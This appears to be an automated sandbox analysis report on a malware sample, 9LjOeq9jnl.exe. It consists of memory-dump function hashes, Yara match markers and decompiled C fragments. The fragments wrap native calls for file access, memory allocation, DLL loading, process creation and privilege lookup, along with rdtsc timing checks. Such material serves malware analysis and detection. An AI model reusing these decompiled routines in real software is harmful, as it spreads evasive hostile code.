Opcode Fuzzy Hash: 867dfa2161f7823a723c097de4b6c6ffd355fa05af6989ad9dcc4d25b760f927
Instruction Fuzzy Hash: 5E21F271604240DFDB14DF64D9C8B26BB66FB88324F28C96AD80A4B34AC337D847DA61

Uniqueness

Uniqueness Score: -1.00%

Function 00FDD1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.340980832.0000000000FDD000.00000040.00000001.sdmp, Offset: 00FDD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c12c8b3c61319f79ad70509c554487e2363d826a2a375b77f6df03cffca45e83
Instruction ID: c89f37c55f67b495fda35b021a6a724af5fa9f2efbbcfa836617d982bf450b4b
Opcode Fuzzy Hash: c12c8b3c61319f79ad70509c554487e2363d826a2a375b77f6df03cffca45e83
Instruction Fuzzy Hash: 81210771904204EFDB05DF54D9C0B26BB66FB84324F28C96ED8494B341C336D846DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00FDD005, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.340980832.0000000000FDD000.00000040.00000001.sdmp, Offset: 00FDD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081f0ef3a9b47a5bfdcfa25620d8387cc4dccede5ae25f1981d96aeff12196b8
Instruction ID: 0acf3573f23d76034d1464fffb3a26298655d741cdbb2850fc60093a79f05e57
Opcode Fuzzy Hash: 081f0ef3a9b47a5bfdcfa25620d8387cc4dccede5ae25f1981d96aeff12196b8
Instruction Fuzzy Hash: 012180755093C08FCB12CF24D994715BF71EB86324F28C5EBD8498B697C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00FCD1F7, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.340954788.0000000000FCD000.00000040.00000001.sdmp, Offset: 00FCD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 133848dfa26b84daca981d4c4d2bc97141f5f4f1cda23a139e6580e7ce35543d
Instruction ID: 432ae4686fa770fc67c7705505721e469c184c3c3cd8b2a2b88c8082540c4edb
Opcode Fuzzy Hash: 133848dfa26b84daca981d4c4d2bc97141f5f4f1cda23a139e6580e7ce35543d
Instruction Fuzzy Hash: 9B219D76804280DFDB06CF50DAC4B5ABF71FB84320F24C6A9DC050A656C33AD86ADBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FCD4BF, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.340954788.0000000000FCD000.00000040.00000001.sdmp, Offset: 00FCD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dc997c99bd989ad9e342aa38babf37e9ac57049c72bd5d22a9deee1ea805652
Instruction ID: accdfe2af1cc789195c74c3878b6a2cc7fc1339819d9763668d84b313017fd11
Opcode Fuzzy Hash: 3dc997c99bd989ad9e342aa38babf37e9ac57049c72bd5d22a9deee1ea805652
Instruction Fuzzy Hash: 0B11B176804280CFCB15DF14DAC4B1ABF71FB84324F28CAADD8450B656C336D85ADBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FDD1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.340980832.0000000000FDD000.00000040.00000001.sdmp, Offset: 00FDD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e279124291f20297b9b187c3294b06941cdaf3a9b439075604eb1c60eb114b78
Instruction ID: e8ddb5381a186b47907a0cd0d673facdbac3ee419c8a5fb58b87c4233abc7d71
Opcode Fuzzy Hash: e279124291f20297b9b187c3294b06941cdaf3a9b439075604eb1c60eb114b78
Instruction Fuzzy Hash: 4011BB75904280DFCB05DF10C9C0B15BBB2FB84324F28C6AED8494B756C33AD84ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 00FCD7D1, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.340954788.0000000000FCD000.00000040.00000001.sdmp, Offset: 00FCD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2681012445f933b4278f9cda8dcb5c62f6ef91dbfb5cf0e3a977c1b4dc189116
Instruction ID: 09bc6163ed4e2e02d7f9eb388976c53cec04ed6fb727938c1906def2b61fbbe2
Opcode Fuzzy Hash: 2681012445f933b4278f9cda8dcb5c62f6ef91dbfb5cf0e3a977c1b4dc189116
Instruction Fuzzy Hash: 0F01F771904344AADB204A65CE85BAABBDCEF44334F18846EED040A282C3749844EAB1

Uniqueness

Uniqueness Score: -1.00%

Function 00FCD7D0, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.340954788.0000000000FCD000.00000040.00000001.sdmp, Offset: 00FCD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a75cb19417e2747662c3d14cb2d1b9045e5b860c8f3ec79da719974e550c7f64
Instruction ID: 97529bdcbaea263be5a98c475437bc11e81657bf3e15aac2a211262e80ee98c9
Opcode Fuzzy Hash: a75cb19417e2747662c3d14cb2d1b9045e5b860c8f3ec79da719974e550c7f64
Instruction Fuzzy Hash: 6DF0C8718042449EE7108E09CDC4B66FFD8EB41334F18C45EED080F282C3745844DAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 070C1860, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.348806550.00000000070C0000.00000040.00000001.sdmp, Offset: 070C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ad37c359c1ea41c96a13698c24fda118a9a24938225ea2ea3f3f3413de94da1
Instruction ID: 8c8100aa4cc8f177203516ff7bce613787466bf540dd8b967a7ba4c3539c3d8c
Opcode Fuzzy Hash: 6ad37c359c1ea41c96a13698c24fda118a9a24938225ea2ea3f3f3413de94da1
Instruction Fuzzy Hash: 4C01FDB0D0426CCBDB20CF58D8447ECB7B4BB4A314F0012EAD849A3242C7744AD08F10

Uniqueness

Uniqueness Score: -1.00%

Function 070C1A02, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.348806550.00000000070C0000.00000040.00000001.sdmp, Offset: 070C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 167bff77687299516f291df6a83af62e84a1a7b874c207af6da838098471144c
Instruction ID: 226cffc30c366365c8192cc8c0ecc307a4a6c423ff748d08933d5f1e42d495a4
Opcode Fuzzy Hash: 167bff77687299516f291df6a83af62e84a1a7b874c207af6da838098471144c
Instruction Fuzzy Hash: 03F0B8B4E002688BDB60EFA4E9447ECBBB4AF8A315F0011EAD90DB7241DB301A818F11

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 9LjOeq9jnl.exe PID: 6936 Parent PID: 4348 9LjOeq9jnl.exeCOMMON

Executed Functions

Function 0041866E, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0041866E(signed int __edx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, char _a28, intOrPtr _a32, char _a36) {
				intOrPtr _v0;
				signed int _v117;
				void* _t20;
				void* _t30;
				intOrPtr* _t31;
				void* _t33;

				_v117 = _v117 ^ __edx;
				_t15 = _v0;
				_t31 = _v0 + 0xc48;
				E004191C0(_v0, _t15, _t31,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x2a);
				_t6 =  &_a36; // 0x413a31
				_t8 =  &_a28; // 0x413d72
				_t14 =  &_a4; // 0x413d72
				_t20 =  *((intOrPtr*)( *_t31))( *_t14, _a8, _a12, _a16, _a20, _a24,  *_t8, _a32,  *_t6, _t30, _t33, __edx); // executed
				return _t20;
			}

0x0041866f
0x00418673
0x0041867f
0x00418687
0x0041868c
0x00418692
0x004186ad
0x004186b5
0x004186b9

APIs

NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186B5

Strings

1:A, xrefs: 0041868C, 00418698
r=A, xrefs: 00418692, 004186A0
r=A, xrefs: 004186AD, 004186B4

Memory Dump Source

Source File: 00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: 1:A$r=A$r=A
API String ID: 2738559852-4243674446
Opcode ID: 94750a081ea5df0b42dff0cfba37f59e2559672dc67f1e5ce506d1bcc3b3793f
Instruction ID: f98354709d6c0bc9065ca04a702ec206925ddc2625e3f65bcad72d1d909c8930
Opcode Fuzzy Hash: 94750a081ea5df0b42dff0cfba37f59e2559672dc67f1e5ce506d1bcc3b3793f
Instruction Fuzzy Hash: 15F0F4B2200108AFCB14CF99CC80EEB77A9AF8C354F15824CFE0DA7241C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00418670, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418670(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t13 = _a4;
				_t27 = _a4 + 0xc48;
				E004191C0(_t13, _t13, _t27,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a31
				_t6 =  &_a32; // 0x413d72
				_t12 =  &_a8; // 0x413d72
				_t18 =  *((intOrPtr*)( *_t27))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}

0x00418673
0x0041867f
0x00418687
0x0041868c
0x00418692
0x004186ad
0x004186b5
0x004186b9

APIs

NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186B5

Strings

1:A, xrefs: 0041868C, 00418698
r=A, xrefs: 00418692, 004186A0
r=A, xrefs: 004186AD, 004186B4

Memory Dump Source

Source File: 00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: 1:A$r=A$r=A
API String ID: 2738559852-4243674446
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: f9e3a3d0e989e08c3f59baf01a417991646d82ee4afc000ab6c713d5a761e92c
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 12F0F4B2200208ABCB04DF89CC80EEB77ADAF8C714F018248BA0D97241C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00409B40, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B40(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t33;
				void* _t34;
				void* _t35;

				_v8 =  &_v536;
				_t15 = E0041AF50(__ebx, __edi, __esi,  &_v12, 0x104, _a8);
				_t34 = _t33 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B370(__eflags, _v8);
					_t35 = _t34 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B5F0( &_v12, 0);
						_t35 = _t35 + 8;
					}
					_t18 = E00419700(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x00409b5c
0x00409b5f
0x00409b64
0x00409b69
0x00409b73
0x00409b78
0x00409b7b
0x00409b7d
0x00409b85
0x00409b8a
0x00409b8a
0x00409b91
0x00409b99
0x00409b9c
0x00409b9e
0x00409bb2
0x00000000
0x00409bb4
0x00409bba
0x00409b6e
0x00409b6e
0x00409b6e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2

Memory Dump Source

Source File: 00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
Instruction ID: 122e155802c76e8fe71ecbd5f026ee28347fd4ee7a5d85f817b14445866b07dd
Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
Instruction Fuzzy Hash: 55014CB5D0020DBBDF10DAA1EC42FDEB378AB54318F0441AAE908A7281F634EB54CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004185C0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004185C0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191C0(_a4, _a4, _t3,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x004185cf
0x004185d7
0x0041860d
0x00418611

APIs

NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041860D

Memory Dump Source

Source File: 00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 8eb6fbd051b3d6e3bdc80b0b17e8b32b36fddcadecc1da7b7e8bd51c52942836
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 9DF0BDB2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041879A, Relevance: 1.5, APIs: 1, Instructions: 31
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041879A(void* __eax, intOrPtr __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				intOrPtr _v117;
				long _t19;

				_v117 = __edx;
				_t15 = _a4;
				_t7 = _t15 + 0xc60; // 0xca0
				E004191C0(_a4, _a4, _t7,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x30);
				_t19 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t19;
			}

0x0041879f
0x004187a3
0x004187af
0x004187b7
0x004187d9
0x004187dd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00419394,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187D9

Memory Dump Source

Source File: 00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: abb91b7e97b40279af1dee3f3751010f94b9b31f273ceb7b626929d5acdc0d5e
Instruction ID: 96809981d0a8fdf79ce76753a0317329ab16421fa70edbcd0fc906dabbcec608
Opcode Fuzzy Hash: abb91b7e97b40279af1dee3f3751010f94b9b31f273ceb7b626929d5acdc0d5e
Instruction Fuzzy Hash: 7CF0F8B2610218BFDB14DF99CC81EEB77ADEF88354F118559FE09A7241C634E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004187A0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004187A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191C0(_a4, _a4, _t3,  *((intOrPtr*)(_t10 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}

0x004187af
0x004187b7
0x004187d9
0x004187dd

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00419394,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187D9

Memory Dump Source

Source File: 00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: 25d322934daf616d54f73205e359e97dd0d0108bb283116572f6f6fe365e7cad
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: F5F015B2200208ABDB14DF89CC81EEB77ADAF88754F118549FE0897241C630F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004186F0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004186F0(intOrPtr _a4, void* _a8) {
				long _t8;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409763
				E004191C0(_a4, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}

0x004186f3
0x004186f6
0x004186ff
0x00418707
0x00418715
0x00418719

APIs

NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418715

Memory Dump Source

Source File: 00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: 0b0e29a7bb3afeb76cf53b9d16d6e0c91c86644eaa2e8498d895191de08f0161
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 7DD01776200214BBEB10EB99CC89EE77BACEF48760F154499BA189B242C530FA4086E0

Uniqueness

Uniqueness Score: -1.00%

Function 004088D0, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004088D0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E20(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407030( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041A0D0( &_v284, 0x104);
						E0041A740( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DF0(E00413D90(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407060( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070E0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x004088db
0x004088e3
0x004088e5
0x004088ea
0x004088ef
0x00408902
0x00408907
0x00408910
0x0040891c
0x0040892f
0x00408934
0x00408937
0x00408940
0x00408952
0x00408957
0x0040895c
0x00000000
0x00000000
0x0040895e
0x00408962
0x00000000
0x00000000
0x00408964
0x00000000
0x00408962
0x00408966
0x00408969
0x0040896f
0x00408971
0x0040897c
0x00408981
0x00408984
0x00408991
0x0040899c
0x0040899e
0x004089a4
0x004089a8
0x004089ab
0x004089ab
0x004089b2
0x004089b5
0x004089ba
0x004089c7
0x004088f6
0x004088f6
0x004088f6

Memory Dump Source

Source File: 00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4306667aa9f532a2ed7b70f283dd30ae88db4e50b66cecac2bda7e96507e56ad
Instruction ID: cb3335a1e64584eb07a4ea91dadddbc29470679c3074ba74e55a49ec00779158
Opcode Fuzzy Hash: 4306667aa9f532a2ed7b70f283dd30ae88db4e50b66cecac2bda7e96507e56ad
Instruction Fuzzy Hash: ED21FBB2C4420957CB15E6649D42BFF737C9B54304F04057FE989A3181F639AB4987A7

Uniqueness

Uniqueness Score: -1.00%

Function 00418890, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418890(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;

				E004191C0(_a4, _a4, _a4 + 0xc70,  *((intOrPtr*)(_t7 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413536
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}

0x004188a7
0x004188b2
0x004188bd
0x004188c1

APIs

RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188BD

Strings

65A, xrefs: 004188B2, 004188BC

Memory Dump Source

Source File: 00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: 65A
API String ID: 1279760036-2085483392
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 5c156194473f1d05c310d89676d9f0526131e4dffca8646f7b57c59a0eef6258
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 34E012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242C630F910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00407280, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00407280(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* __esi;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t22;
				intOrPtr* _t26;
				void* _t27;
				void* _t31;

				_t31 = __eflags;
				_v68 = 0;
				E0041A120( &_v67, 0, 0x3f);
				E0041AD00( &_v68, 3);
				_t25 = _a4 + 0x1c;
				_t12 = E00409B40(__ebx, __edi, _a4 + 0x1c, _t31, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E50(_t25, _t12, 0, 0, 0xc4e7b6d6);
				_t26 = _t13;
				if(_t26 != 0) {
					_push(__edi);
					_t22 = _a8;
					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t26(_t22, 0x8003, _t27 + (E004092A0(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407280
0x0040728f
0x00407293
0x0040729e
0x004072aa
0x004072ae
0x004072be
0x004072c3
0x004072ca
0x004072cc
0x004072cd
0x004072da
0x004072dc
0x004072de
0x004072fb
0x004072fb
0x00000000
0x004072fd
0x00407302

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA

Memory Dump Source

Source File: 00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 9e39a802d25bf0205d4005b1bd6783377b2ee9f48abcc3171cc4447a97e058b9
Instruction ID: 9e9773ac0b0102b9350b3534e018efb02758e459cfd39c42d1aa5cef431ad939
Opcode Fuzzy Hash: 9e39a802d25bf0205d4005b1bd6783377b2ee9f48abcc3171cc4447a97e058b9
Instruction Fuzzy Hash: E301D431A8022877E720A6959C03FFE772C5B00B55F14016EFF04BA1C2E6A8790542EA

Uniqueness

Uniqueness Score: -1.00%

Function 00418940, Relevance: 1.5, APIs: 1, Instructions: 42
processCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418940(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52) {
				void* _t22;
				intOrPtr* _t33;

				_t16 = _a4;
				_t33 = _a4 + 0xc80;
				E004191C0(_t16, _t16, _t33,  *((intOrPtr*)(_t16 + 0xa14)), 0, 0x37);
				_t22 =  *((intOrPtr*)( *_t33))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
				return _t22;
			}

0x00418943
0x00418952
0x0041895a
0x00418994
0x00418998

APIs

CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,z@,?,?,?), ref: 00418994

Memory Dump Source

Source File: 00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
Instruction ID: ef73407d4302ad113cbd8c7bf54d1e3551c0b1b9378041d777b9cadf2e8fe569
Opcode Fuzzy Hash: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
Instruction Fuzzy Hash: FC01AFB2210108BBCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004188C2, Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004188C2(void* __eax, void* __edi, intOrPtr _a5, void* _a9, long _a13, void* _a17) {
				char _t15;

				_t12 = _a5;
				_t4 = _t12 + 0xc74; // 0xc74
				E004191C0(_a5, _a5, _t4,  *((intOrPtr*)(_t12 + 0x10)), 0, 0x35);
				_t15 = RtlFreeHeap(_a9, _a13, _a17); // executed
				return _t15;
			}

0x004188d3
0x004188df
0x004188e7
0x004188fd
0x00418901

APIs

RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 004188FD

Memory Dump Source

Source File: 00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 0b9f3e2777f9b9c9f64b15974f5f749d78192690e6137513a087d7991a9974ad
Instruction ID: d593e9361b8f901df4ab9315801aac8de0e07cf32cb081cd2a76ddc773bf3396
Opcode Fuzzy Hash: 0b9f3e2777f9b9c9f64b15974f5f749d78192690e6137513a087d7991a9974ad
Instruction Fuzzy Hash: 20E022712002046BCB14DF58CC4AEDB7369EF88340F108514FD089B342C230E802CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 00418A21, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00418A21(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t12;

				asm("scasd");
				asm("bound esi, [edx-0x323d5660]");
				asm("fist dword [ecx-0x74aa6c87]");
				_t9 = _a4;
				E004191C0(_a4, _t9, _a4 + 0xc8c,  *((intOrPtr*)(_t9 + 0xa18)), 0, 0x46);
				_t12 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t12;
			}

0x00418a21
0x00418a26
0x00418a2c
0x00418a33
0x00418a4a
0x00418a60
0x00418a64

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A60

Memory Dump Source

Source File: 00000007.00000002.436271319.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

